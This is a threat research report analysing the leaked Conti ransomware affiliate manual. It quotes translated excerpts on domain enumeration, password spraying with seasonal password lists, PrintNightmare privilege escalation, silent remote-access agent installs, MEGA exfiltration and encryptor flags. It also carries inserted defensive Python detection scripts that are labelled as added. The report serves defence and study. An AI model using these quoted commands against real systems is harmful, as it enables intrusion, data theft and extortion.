
The Affiliate’s Cookbook - A Firsthand Peek into the Operations and Tradecraft of Conti

By Val Saengphaibul | August 10, 2021

FortiGuard Labs Threat Research Report

Ransomware has dominated the media headlines for the first half of 2021. The attack on Colonial Pipeline (DarkSide) disrupted the distribution of oil and gasoline across the East Coast of the United States (ironically, it was the billing system that was taken offline, not the OT devices controlling the supply). The attack on JBS Foods in Brazil (REvil) led to concerns about a potential global meat shortage. And the attack on managed service provider Kaseya VSA (REvil) was a supply chain attack that left downstream customers hit with ransomware.

Prior to these attacks, the tactics, techniques, and procedures (TTPs) of threat actors were discovered either through forensic analysis conducted by incident response teams or via static analysis of the malware itself. However, a disgruntled, self-proclaimed "pentester" of the Conti group recently leaked various insider files to the public. The leak contains password-protected zip files, operational how-to documents, and other reference files created by the group for its affiliates. Because of this leak, we have been given a sneak peek into a ransomware operation from the affiliate perspective.

The Conti ransomware group, in operation for over a year, runs a Ransomware-as-a-Service (RaaS) operation that has been connected to multiple attacks, including a recent high-profile attack on the Irish Health Service that caused massive disruption to services. In that attack, not only were services disrupted and brought to a halt, but SQL database servers and over 700 GB of PII were downloaded and exfiltrated by the threat actors. So, their modus operandi is not just ransom, but extortion by providing proof that valuable data has been exfiltrated.

The primary focus of the following analysis will be on the Conti support manual, titled “CobaltStrike Manuals_V2 Active Directory.” It will touch on several interesting observations lifted from the manual. Although other files and documents were released, this support manual contains information for “affiliates” and offers a rare glimpse into the Ransomware-as-a-Service world.

In this blog, the reader will be presented with the following: 

  • A sneak peek into documentation provided to criminal affiliates and the type of support provided by a ransomware organization.
  • Observations of recent vulnerabilities, suggesting this document is rather new.
  • A perspective into operational strategies, including the TTPs used by the Conti ransomware group, such as tools, methodologies, and an attack overview from its beginning stages to the final ransomware deployment stage.

Nearly a decade of ransomware 

Ransomware in its current form (lock screen, payment in cryptocurrency, etc.) has been around for almost a decade, and yet it still makes media headlines. From the first mass ransomware attacks that displayed a law enforcement logo to the victim (chosen based on the victim's locale) and demanded payment in prepaid credit cards (Reveton, 2012), to the first payments made in Bitcoin (CryptoLocker, 2013), and now Ransomware-as-a-Service (GandCrab, 2018), it has become almost commonplace. So, how is it that it is still making headlines?

It is because attacks are becoming more brazen, and both the victims and the impact of an attack are increasingly high profile. In addition to the ongoing targeting of random, indiscriminate individuals and their machines, criminals are increasingly targeting major organizations and their entire environment, thereby causing noticeable disruptions. It is also worth mentioning that their tradecraft has improved, from the basic social engineering techniques via spear phishing or pirated software still used by low-level criminals, to new advanced strategies where, by the time a ransomware attack is launched, the threat actor has already been inside the victim's network, undiscovered and undetected, sometimes for months before striking.

Another compounding factor is the new RaaS model. This maturing strategy allows vetted "affiliates" to conduct attacks, rather than the organization that developed the malware. Using a sort of franchise model, affiliates earn a hefty share of the ransom while paying the ransomware authors a percentage of their gains. For the developers, the money comes through scalability, giving them time to refine their service rather than hunting for victims. This also means that the rate and volume of attacks necessarily increase as the number of affiliates grows. Reports by researchers estimate that ransomware attacks alone grew by over 150 percent in 2020 and netted attackers over 350 million dollars [1, 2].

[1] Group-IB: ransomware empire prospers in pandemic-hit world. Attacks grow by 150% https://www.group-ib.com/media/ransomware-empire-2021/

[2] Ransomware Skyrocketed in 2020, But There May Be Fewer Culprits Than You Think https://blog.chainalysis.com/reports/ransomware-ecosystem-crypto-crime-2021

Of course, forensic analysis shows that attackers had already successfully embedded themselves inside a network, sometimes for weeks or months at a time, to prepare for executing their attack (interestingly, in a new development, CVE-2020-1472, Zerologon, changed that to hours) [3]. However, we didn't have much insight into the operational tradecraft used by affiliates. We just assumed that they were well-versed in pentesting methodologies and skilled in performing their operations. And while we had heard of some ransomware gangs providing advanced attack support for their affiliates, we didn't really know how much support was provided until now.

[3] https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/

The Affiliates' Cookbook

Figure 1. Guidance to affiliates on searching for a target's revenue, along with Cobalt Strike usage instructions

A cursory analysis of the manual, shown above, highlights the well-documented operational procedures of the Conti ransomware group. Titled CobaltStrike Manuals_V2 Active Directory, the document provides insight into the usage (misuse) of Cobalt Strike, a legitimate post-exploitation tool used by red teams, along with other how-to guidance and advice from the gang.

In figure 1, we see (highlighted in green) a suggestion to affiliates to seek out targets and companies with verifiable income by using publicly available data sources such as Owler, Manta, ZoomInfo, DNB, RocketReach, etc. It also provides working search engine queries to determine company revenue, e.g., "site:XYZ.com revenue", for further specifics. This information is commonly used to gauge the financial resources of less well-known entities, as well as to determine how much an organization is willing to pay.

It also provides operational data for the affiliate once they have established a reverse shell or persistence on the victim's Windows domain controller. It contains instructions on how to list all domain controllers, local and domain administrators, enterprise administrators, and known domain computers inside a network, as well as how to ping all hosts. Once this traversal information has been established, it provides instructions on how to deploy the payload via PowerShell.

Figure 2. Insights for the affiliates to look out for (original transcription)

The text above (figure 2) states that once the various containers are accessed, affiliates should be looking for:

  • Accounting
  • Clients
  • Financial documents 
  • IT
  • Projects

Other advice includes the usage of multiple post-exploitation pentesting tools, along with a variety of open source tools designed to intercept and brute-force passwords at the domain controller. In the following section we look at a number of open source tools identified as Conti's tools of choice, pulled from the machine-translated version of the document.

Kerberoast 

Kerberoasting is a term describing an attack against domain controllers that tries to crack the hash of a Kerberos-encrypted password by brute force. Once the hash is cracked, the password is in clear text, enabling an adversary to traverse deeper into an environment and to add accounts by leveraging compromised higher-level admin accounts. Another suggested tool for affiliates conducting Kerberoast activities is Invoke-Kerberoast.ps1, an open source PowerShell script found on GitHub and maintained by @harmj0y. It is loaded into the Cobalt Strike beacon using the powershell-import command.

The document also defines the ultimate goal as getting the admin password via further brute forcing.

Mimikatz

The manual provides a simple overview of Mimikatz and useful command lines for extracting cleartext passwords from memory, Kerberos tickets, etc. It also highlights examples of combined Mimikatz/Cobalt Strike usage.

Other instructions include guidance on pass-the-hash/NTLM, reading LSASS, procdump, and other post-exploitation techniques. It is also interesting to see, in the screenshot below, a discussion on exploiting the Zerologon (CVE-2020-1472) vulnerability, which suggests how recent this document is.

Figure 3. Example of using Mimikatz and Zerologon (CVE-2020-1472) together to target a local domain controller. Note: contoso.com is a fictional domain used by Microsoft in training materials and documentation as an example local domain.

SMBAutoBrute

The manual also provides guidance on using the open source tool SMBAutoBrute. According to the GitHub page for this tool, it allows pentesters to perform smart brute forcing of accounts against the current domain, ensuring that lockouts do not occur. On a side note, researchers at SentinelOne highlighted the usage of SMBAutoBrute within Cobalt Strike in their June 2020 analysis of TrickBot and Ryuk threat actors [4].

[4] Inside a TrickBot Cobalt Strike Attack Server https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/

Along with instructions, the authors provide additional guidance, as shown in figure 4, which has been machine-translated from the Russian:

    If there are fewer of these passwords than we can run in a brute-force attack, safely supplement them from the following list of the most frequently occurring ones in the corporate environment.

    Password1
    Hello123
    password
    Welcome1
    banco @ 1
    training
    Password123
    job12345
    spring
    food1234

    It is also recommended to use a list of passwords based on the times of the year and the current year. Given that passwords are changed once every three months, you can take a "reserve" when generating the list.

    For example, in August 2020, we create a list with the following content:

    June2020
    July2020
    August20
    August2020
    Summer20
    Summer2020
    June2020!
    July2020!
    August20!
    August2020!
    Summer20!
    Summer2020!

    All of the passwords above satisfy either 3 out of 4 requirements for Active Directory passwords (which is enough for users to set them), or all 4 requirements.

    Note: we consider the most popular version of the requirements.

Figure 4. Examples of suggestions provided by the threat actors, especially passwords based on the time of year
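As an added defensive example (not code from the leaked manual or from Fortinet), the following Python checks whether a candidate password satisfies the 3-of-4 character-category rule the excerpt refers to and whether it still matches the excerpt's guessing lists: the static list, or a month or season followed by a 2- or 4-digit year and an optional symbol. A password filter or audit script should reject both kinds; the year window and the symbol set are assumptions.

```python
"""Checks a candidate password against the patterns in the excerpt above:
the static list, and month/season + year (+ optional symbol) lists, even
when the password satisfies the 3-of-4 category rule. Added example; it is
not code from the leaked manual or from Fortinet."""
import re
from datetime import date
from typing import Optional

# Constructed copy of the excerpt's static list, spacing normalised, lower-cased.
MANUAL_STATIC_LIST = {
    "password1", "hello123", "password", "welcome1", "banco@1",
    "training", "password123", "job12345", "spring", "food1234",
}

MONTHS = ("january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december")
SEASONS = ("spring", "summer", "autumn", "fall", "winter")

# Matches Summer20, August2020!, june2021@ ...: word, 2- or 4-digit year,
# then up to two trailing symbols (the symbol set is an assumption).
SEASONAL_RE = re.compile(
    r"^(?P<word>" + "|".join(MONTHS + SEASONS) + r")"
    r"(?P<year>\d{4}|\d{2})"
    r"(?P<suffix>[!@#$%^&*.?]{0,2})$",
    re.IGNORECASE,
)

# Reference date used by the demo: the August 2020 scenario in the excerpt.
REFERENCE_DATE = date(2020, 8, 15)


def meets_ad_complexity(password: str, min_length: int = 7) -> bool:
    """Approximates the rule the excerpt calls '3 out of 4 requirements':
    minimum length plus characters from at least 3 of 4 categories
    (upper, lower, digit, non-alphanumeric). The real AD policy also
    rejects passwords containing parts of the account name; not modelled."""
    categories = (
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    )
    return len(password) >= min_length and sum(categories) >= 3


def _year_in_window(year_text: str, today: date, slack: int = 1) -> bool:
    """2-digit years are read as 20xx; accept today's year +/- slack, which
    covers the excerpt's advice to generate the list a quarter ahead."""
    year = int(year_text)
    if year < 100:
        year += 2000
    return today.year - slack <= year <= today.year + slack


def predictable_reason(password: str, today: date) -> Optional[str]:
    """Return why the password matches the excerpt's guessing lists, else None."""
    normalised = password.replace(" ", "").lower()
    if normalised in MANUAL_STATIC_LIST:
        return "in the manual's static list"
    m = SEASONAL_RE.match(normalised)
    if m and _year_in_window(m.group("year"), today):
        return f"season/month '{m.group('word')}' + year {m.group('year')}"
    return None


def audit(password: str, today: date) -> dict:
    """Report both results the way a password filter would."""
    return {
        "password": password,
        "meets_complexity": meets_ad_complexity(password),
        "predictable": predictable_reason(password, today),
    }


if __name__ == "__main__":
    # Constructed candidates: entries from the excerpt's August 2020 list,
    # one static-list entry, and an unrelated control password.
    for pw in ("Summer2020!", "August20", "Welcome1", "spring", "Tr0ub4dor&3-stapler"):
        print(audit(pw, REFERENCE_DATE))
```

The point of the output is that "Summer2020!" and "August20" pass the complexity rule yet are flagged as predictable, which is why a category rule alone is not a defence against this list.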


The example below highlights the successful discovery of the Administrator and CiscoDirSvcs accounts using 1qazXDR% as the password. Note that this is a common password because, if you look at your keyboard, it makes a V pattern:

    6. We look at the progress of the script and see the result

    Success! Username: Administrator. Password: 1qazXDR% +
    Success! Username: CiscoDirSvcs. Password: 1qazXDR% +

    We got two domain administrators out of the way.

    The scenario without specifying a list of users differs in only two ways.

    psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR% +" -LockoutThreshold 5

Figure 4b. Examples of password suggestions provided by the threat actors based on time of year, etc.


The example above highlights the gang's efforts to provide useful insight to their affiliates, based on what we assume are their own experiences, as they appear to have pentesters on their staff or, at least, individuals knowledgeable of pentesting techniques.

The example below highlights the domain controller information for a successful construction company that has likely already been a victim of the gang. The document further tells the reader to look for the parameter:

    Lockout threshold: Never

Setting the lockout threshold to "Never" means that an account will not be locked out no matter how many failed logon attempts occur:

    Scenario with domain administrators

    1. We collect the list of domain administrators with the command

    shell net group "domain admins" /dom

    We write the received data to the admins.txt file

    2. Upload the file to the host in the folder C:\ProgramData

    3. Request information on the domain account lockout policy (protection against brute force)

    beacon> shell net accounts /dom

    Tasked beacon to run: net accounts /dom
    host called home, sent: 48 bytes
    received output:

    The request will be processed at a domain controller for domain [redacted]construction.com.

    Force user logoff how long after time expires?:   Never
    Minimum password age (days):                      1
    Maximum password age (days):                      42
    Minimum password length:                          6
    Length of password history maintained:            24
    Lockout threshold:                                Never
    Lockout duration (minutes):                       30
    Lockout observation window (minutes):             30
    Computer role:                                    BACKUP

Figure 5. More Context into the Forced User Logoff Module
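As an added defensive example (not code from the manual or from Fortinet), this Python parses `net accounts /dom` output in the format transcribed above and reports the policy values an affiliate running SMBAutoBrute with -LockoutThreshold would be looking for. The sample text is a constructed copy of figure 5 with the victim domain replaced by a placeholder; the thresholds and severity labels are assumptions.

```python
"""Parses `net accounts /dom` output as transcribed in figure 5 and flags the
policy values that make password guessing cheap. Added example, not code
from the manual or from Fortinet; thresholds and severities are assumptions."""
import re
from typing import Dict, List, Tuple, Union

Policy = Dict[str, Union[int, str]]

# Constructed copy of the figure 5 output; the real domain is replaced.
SAMPLE_OUTPUT = """\
The request will be processed at a domain controller for domain example-construction.invalid.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              6
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        BACKUP
The command completed successfully.
"""

# "key:   value" with the value right-aligned by net.exe; keys may contain '?'.
LINE_RE = re.compile(r"^(?P<key>[^:]+?)\s*:\s*(?P<value>\S.*?)\s*$")


def parse_net_accounts(text: str) -> Policy:
    """Turn the output into a dict; numeric values become int."""
    policy: Policy = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banner lines carry no colon-separated setting
        value = m.group("value")
        policy[m.group("key")] = int(value) if value.isdigit() else value
    return policy


def assess(policy: Policy) -> List[Tuple[str, str]]:
    """Return (severity, message) findings in descending order of concern."""
    findings: List[Tuple[str, str]] = []
    threshold = policy.get("Lockout threshold")
    window = policy.get("Lockout observation window (minutes)")
    if threshold in (None, "Never", 0):
        findings.append(("high", "Lockout threshold is Never: guessing against "
                                 "any account is unlimited, which is the setting "
                                 "the manual tells affiliates to look for"))
    elif isinstance(threshold, int):
        # SMBAutoBrute's -LockoutThreshold mirrors this budget from the other side.
        findings.append(("info", f"An attacker can try {threshold - 1} guesses per "
                                 f"account every {window} minutes without lockout"))
    min_len = policy.get("Minimum password length")
    if isinstance(min_len, int) and min_len < 8:
        findings.append(("medium", f"Minimum password length {min_len} permits "
                                   "short entries from the manual's list such as 'spring'"))
    max_age = policy.get("Maximum password age (days)")
    if isinstance(max_age, int) and max_age <= 90:
        findings.append(("low", f"Maximum password age {max_age} days: forced rotation "
                                "invites the season/month + year passwords the manual guesses"))
    return findings


if __name__ == "__main__":
    for severity, message in assess(parse_net_accounts(SAMPLE_OUTPUT)):
        print(f"[{severity}] {message}")
```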

Leveraging Recent Vulnerabilities 

Zerologon and #PrintNightMare

The references to CVE-2020-1472 (privilege escalation in Netlogon, also known as Zerologon) and to #PrintNightmare (tracked as CVE-2021-1675 and CVE-2021-34527) reveal how recent this document is. It shows that it was either recently created or updated. For reference, CVE-2020-1472 allows an unauthenticated attacker with network access to a domain controller to compromise Active Directory identity services.

The excerpt below highlights the exploitation of these two recent vulnerabilities, the July 2021 Microsoft Windows Print Spooler vulnerabilities. Essentially, they allow a normal user account to fully take over and control a client or server machine running an affected Print Spooler service. Although similar in scope, CVE-2021-1675 is local while CVE-2021-34527 is remotely exploitable. The excerpt shows a PowerShell script obtained from GitHub being loaded into Cobalt Strike; the GitHub URL is also provided by the threat actors:

    7. PrintNightmare

    The vulnerability is fresh, but already sensational. We use it until it gets shut down) CVE-2021-34527 allows you to create a local administrator, useful if an agent arrived with the rights of a simple user.

    On the agent:

    powershell-import    // import the file CVE-2021-34527.ps1

    powershell Invoke-Nightmare -NewUser "HACKER" -NewPassword "FUCKER" -DriverName "Xeroxxx"    // create user HACKER with password FUCKER, add to local admins

    spawnas COMPNAME\HACKER FUCKER https    // instead of https, the listener name

    The agent arrives from under our new local administrator. There is also a chance to get the agent from under SYSTEM*; we do the following after import:

    Invoke-Nightmare -DLL "\polniy\put\do\payload.dll"

Figure 6. Leveraging #PrintNightmare via PowerShell import in Cobalt Strike

Leveraging MS17-010 (EternalBlue)

Contained within the document are references to EternalBlue (covering CVE-2017-0143 through CVE-2017-0148). EternalBlue was the Windows SMB server exploit that began as a Microsoft Windows zero-day stockpiled by the NSA. It was ultimately disclosed as part of the Shadow Brokers breach of the NSA in 2017. This disclosure by the Shadow Brokers (a clandestine group unofficially linked to Russia) led to the notorious WannaCry, Petya, and NotPetya attacks that exploited this vulnerability.

Note that this section appears to have been written long ago, well before the Conti gang surfaced, as it refers to Windows versions as unpatched even though Microsoft patched and addressed them in May of 2017. This likely indicates that this section is either a copy-and-paste job lifted from another source, or was repurposed by the gang from a document created under a previous guise and simply not updated:

    8. ms17_010

    Windows XP and 2003 - do not have the ms17_010 patch

    Windows 7, 8, 10, 2008, 2012, 2016 - may be unpatched and correspondingly vulnerable. During the attack on them, to increase the chances of a successful operation, specify the login and password of a domain user.

    Removed AD, pinged the IP addresses.

    IP addresses must be written on one line, separated by spaces.

    1. Launching a proxy in Cobalt Strike:

    In the Cobalt Strike console, enter the command:

Figure 7. References to EternalBlue which appear to be outdated

Suggested Agents to Deploy

Figure 8. Listing of Remote Management Software (AnyDesk, Atera)

The above excerpt highlights the usage of Mimikatz within a Cobalt Strike beacon to dump domain password hashes via NTDS.dit (the Active Directory database file, which holds the password hashes). Once this is done, the reader is instructed to install AnyDesk on all abandoned hosts, and Atera on the rest, as seen below:

Figure 9. Instructions to install Anydesk and other agents (machine translated from Russian)

Further instructions are provided to the affiliate to use the following flags for deployment:

    --start-with-win --silent

According to the AnyDesk website, the flag --start-with-win starts AnyDesk with Windows, which is necessary for remote restart, etc., and the flag --silent does not start AnyDesk after installation and does not display error message boxes.
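As an added detection example (not code from the manual or from Fortinet), the following Python flags unattended installs of the remote-access agents the manual tells affiliates to deploy, using process-creation events: AnyDesk launched with the --start-with-win and --silent switches quoted above, and a quiet MSI install of the Atera agent. The events are constructed, the field names follow Sysmon Event ID 1 naming (Image, CommandLine, ParentImage) and would be mapped from your own SIEM schema, the --install switch is taken from AnyDesk's documented installer syntax, and the AteraAgent.msi file name is a placeholder to adjust to the installer name your environment actually sees.

```python
"""Flags unattended installs of AnyDesk (--install/--start-with-win/--silent)
and Atera (quiet msiexec) from process-creation events. Added example, not
code from the manual or from Fortinet; events and names are constructed."""
import re
from typing import Dict, List, Optional

# Constructed process-creation events using Sysmon Event ID 1 field names.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Users\Public\AnyDesk.exe",
     "CommandLine": r'C:\Users\Public\AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "CommandLine": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\AteraAgent.msi /qn IntegratorLogin=ops@example.invalid",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# AnyDesk installer switches: --start-with-win and --silent are quoted on the
# page; --install is AnyDesk's documented unattended-install switch (assumption).
ANYDESK_UNATTENDED = re.compile(r"(?<!\S)--(?:install|start-with-win|silent)(?!\S)", re.I)
# msiexec quiet switches; paired with the (placeholder) Atera MSI name below.
MSI_QUIET = re.compile(r"(?<!\S)/(?:qn|quiet|qb)(?!\S)", re.I)
# Parents that indicate scripted deployment rather than an admin clicking an installer.
SCRIPT_PARENTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "rundll32.exe", "mshta.exe")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert dict for a matching event, or None."""
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    parent = _basename(event.get("ParentImage", ""))
    reason = None
    if "anydesk" in image and ANYDESK_UNATTENDED.search(cmd):
        flags = sorted({f.lower() for f in ANYDESK_UNATTENDED.findall(cmd)})
        reason = f"AnyDesk unattended install ({' '.join(flags)})"
    elif image == "msiexec.exe" and MSI_QUIET.search(cmd) and "ateraagent" in cmd.lower():
        reason = "Atera agent silent MSI install"
    if reason is None:
        return None
    # Deployment from a scripting host is the pattern the manual describes
    # (agent pushed from a beacon), so it is scored higher than a GUI launch.
    severity = "high" if parent in SCRIPT_PARENTS else "medium"
    return {"severity": severity, "reason": reason, "parent": parent, "image": image}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a batch of events and keep only the alerts."""
    return [alert for alert in (classify(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

An interactive launch of an already installed AnyDesk (second sample event) produces no alert here; whether that is tolerated at all is the application-control decision the Fortinet Protections section below recommends making.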

Getting Closer to the End

Looking for network-attached storage and other backup devices and finding them a new home

The guide also provides affiliates with suggestions for using Netscan, which makes finding backup directories and network-attached storage (NAS) devices easier. This is done to improve the chances of payment, as well as to locate more data to exfiltrate. The manual also suggests that the reader view disks by size, as that is where the "juice" is hidden. Also documented is RouterScan, another open source pentesting tool that allows someone to find devices on a network, such as routers, web cameras, NAS, and any other device with a web interface that can be brute-forced.

Figure 10. Suggestion and instructions on using netscan

Getting ready for exfiltration

To house and store exfiltrated data, the document suggests creating a MEGA.io account. Before this account is created, it also suggests paying for it in cryptocurrency and choosing the 2 TB plan:

Figure 11. Suggestion and instructions on setting up MEGA for uploading exfiltrated data

Preparing for Exfiltration, Determining Insurance Levels, and Finally, the Lock Process

Once the MEGA account has been created, it suggests that the affiliate begin looking for items of interest, including bank statements for 2021, account reports, various security documents (assuming red/blue team information), and whether the organization has a cybersecurity insurance policy! Again, according to the authors, anything "juicy." Affiliates who have exfiltrated this data must be sure to prepare the "datapack" right away, back it up to MEGA, and list all the documents (perhaps as proof of exfiltration). Automated mass exfiltration is made even easier using the tool rclone.

Exfiltrating the data has several advantages, such as providing proof of knowledge of what is going on within the victim’s organization and then using that information as leverage in different types of negotiations.

    Preparing the datapack

    We go to MEGA from Tor and search by keywords. We need accounting reports, bank statements for 2020-21, everything fresh.

    Especially important: cyber insurance, security policy documents.

    Search keywords:

    cyber
    policy
    insurance
    endorsement
    supplementary
    underwriting
    terms
    bank
    2020
    2021
    Statement

    and everything that can be juicy.

    Whoever is downloading information always
    prepares the datapack right away,
    immediately backs up the info to MEGA,
    and makes a complete listing of all information!

Figure 12. Setting up the datapack and things to look for

The excerpt below highlights the beginning of the ransom lock process stage. In this example, we see that the Conti threat actors use a batch file to deploy a file across the domain. The document also provides instructions for Linux, as well as various flags for locating known and unknown drives, disabling VMware services (including ESXi), deleting shadow copies, and then engaging in a mass lock, which likely means encrypting all identified computers on a network.

Figure 13a. Setting up the lock process

New Linux Version and Targeting VMware?

There are also some instructions that highlight paths for Linux/Unix versions, as well as versions possibly targeting VMware, though we have not observed any in the wild (coincidentally, it has been reported that REvil has a Linux variant that targets VMware's ESXi [5]). Could this be a new or future feature? It also suggests that if the SSH connection to a targeted machine fails, the encryption process will continue anyway. Usually, when an SSH session drops within a Linux/Unix environment, a SIGHUP (hangup) signal is sent to terminate the script, but the authors have thought this through to make sure that doesn't happen.

[5] Linux Variant of REvil Ransomware Targets VMware's ESXi, NAS Devices https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/

    Unix version launch parameters

    --path
        When using this parameter, the locker will encrypt files in the specified path. A required parameter: it will not lock anything without it.

        ./encryptor --path /path

    --prockiller
        Kills all processes that interfere with the opening of files.
        ./encryptor --path /path --prockiller

    --log
        Includes logging of all actions and errors
        ./encryptor --path /path --log /root/log.txt

    --vmkiller (only for ESXi)
        Shuts down all virtual machines

    --vmlist (only for ESXi)
        Specifies a file with a list of virtual machines that should not be shut down. One line for each VM.
        ./encryptor --path /path --vmkiller --vmlist /tmp/list.txt

    --detach
        Detaches the process from the terminal, so that if the SSH session drops, the locker will continue to work.

Figure 13b. Setting up the lock process (Linux and VMware)

Disabling AV

There is also a section dedicated to defeating built-in AV tools, such as Windows Defender. Tips to defeat another well-known antivirus vendor's product are also offered. This is deployed via batch files and scheduled tasks.

Other Items of Interest

Operation Security Guidance (Anonymity for paranoid.txt)

Notes on operational guidance for remaining anonymous are also provided by the Conti group. They highlight the importance of remaining anonymous, but also argue that hiding is not the goal: disabling known services and technologies only makes the attacker more likely to be detected, so the advice is to blend in instead. They even advise against using well-known Linux pentesting operating systems, suggesting either generic distributions or building their own.

    A couple of notes on the posts about anonymity for the paranoid:

    1. The task is not to hide (that won't work anyway), but to blend in with the crowd. So by disabling WebRTC, JavaScript, Flash, etc. you will only draw more attention to yourself. You need NOT to DISABLE, but to SUBSTITUTE what allows you to be detected.

    2. Regarding Kali and other operating systems for hackers. Suppose there is a group of people (hackers) who need to be tracked. Technically, this problem is hard to solve. It is easier to play on human weakness (laziness) and gather everyone in one place by offering a properly advertised, convenient, ready-made and popular solution. I think the idea is clear. I advise using Debian or building something of your own.

    Saint, thanks for the material, I added NetScan to the algorithm

Figure 14. Notes on operational awareness (translated from the Russian original)

The Affiliate's Cookbook Conclusion

Although the instructions provided in the manual are well documented, some portions of the content appear to be rehashed or likely repurposed from elsewhere, reminiscent of the 2000s reworking of the classic 1970s Anarchist Cookbook, Jolly Roger's Anarchy Cookbook. However, this doesn't mean that the document is poorly written. It is actually quite novel to see the time and effort taken by threat actors engaged in illegal activity to properly document some of their tradecraft, regardless of refinement or plagiarism, thereby allowing others who are less skilled or less experienced to gain a fundamental understanding of how to get started.

Of course, it makes a lot of sense for a ransomware gang to make it easier for their affiliates to use their ransomware, as this is a business and there are competitors out there. Any outfit run like a business will pay attention to things like market share and usage frequency, and will therefore make an effort to increase the likelihood of affiliate adoption to increase market share and profitability.

Fortinet Protections

FortiGuard Labs provides the following AV coverage against known Conti ransomware samples from this campaign:

W32/Conti.I!tr
W64/Filecoder_Conti.A!tr
W64/Conti.A!tr.ransom
W32/Filecoder_Conti.D!tr
W32/Conti.R!tr.ransom
W32/Conti.HLCT!tr.ransom
W32/Filecoder_Conti.R!tr
W32/Conti.L!tr.ransom
W32/Conti.N!tr.ransom
W64/Conti.M!tr.ransom

All known network IOCs are blocked by the WebFiltering client.

FortiEDR detects and blocks Conti ransomware attacks out of the box without any prior knowledge or special configuration beforehand. This can be seen in the images below, where the TTPs of the attackers are detected pre-execution.

For more information on how FortiEDR blocks Conti, please refer to the following KB article:

As many Conti affiliates have been observed using AnyDesk, Atera, Splashtop, Remote Utilities, and ScreenConnect to establish and maintain persistent network access, it is recommended that organizations block all remote access connections from these programs using application controls if there is no business justification for their use.

Due to the ease of disruption and damage to daily operations and the reputation of an organization, as well as the unwanted release of personally identifiable information (PII), etc., it is important to keep all AV and IPS signatures up to date.

It is also important to ensure that all known vendor vulnerabilities are addressed and updated to prevent attackers from gaining a foothold within a network. Attackers are well-aware of the difficulty of patching, and they exploit that reality. Therefore, if it is determined that patching anywhere in the network is not currently feasible, an assessment should be conducted to determine risk and alternative protections, such as hot patching, should take place.

And finally, organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spear phishing attacks. They need to be able to identify attacks, know never to open attachments from someone they don't know, and always treat emails from unrecognized/untrusted senders with caution. Since many ransomware attacks are also delivered via social engineering, it is crucial that end users be made aware of the various types of attacks being used against them through regular training sessions and impromptu tests using predetermined templates by an organization's internal security department. Simple user awareness training on how to spot emails with malicious attachments or links could also help prevent initial access into the network.

Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.
